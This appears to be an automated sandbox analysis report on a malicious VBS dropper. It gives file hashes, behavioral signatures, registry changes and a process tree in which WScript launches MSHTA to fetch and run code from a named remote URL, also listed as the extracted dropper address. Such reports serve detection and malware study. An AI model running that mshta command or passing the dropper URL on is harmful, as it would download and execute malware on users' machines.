Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
09-08-2022 18:31
Static task
static1
Behavioral task
behavioral1
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win7-20220715-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win10v2004-20220721-en
11 signatures
150 seconds
General
-
Target
DWRNHNKWSJEHWYPNYOGGOP.vbs
-
Size
1KB
-
MD5
43f89bd927a7e80c8240c61617dee7bf
-
SHA1
6a8ab5c11c1afd276cf5dbb7b125cff26080459f
-
SHA256
f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
-
SHA512
f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tradeguru.com.pk/enc2.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEdescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1648 MSHTA.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
MSHTA.EXEflow pid process 4 1552 MSHTA.EXE 5 1552 MSHTA.EXE 6 1552 MSHTA.EXE 7 1552 MSHTA.EXE -
Processes:
MSHTA.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main MSHTA.EXE
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc2.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings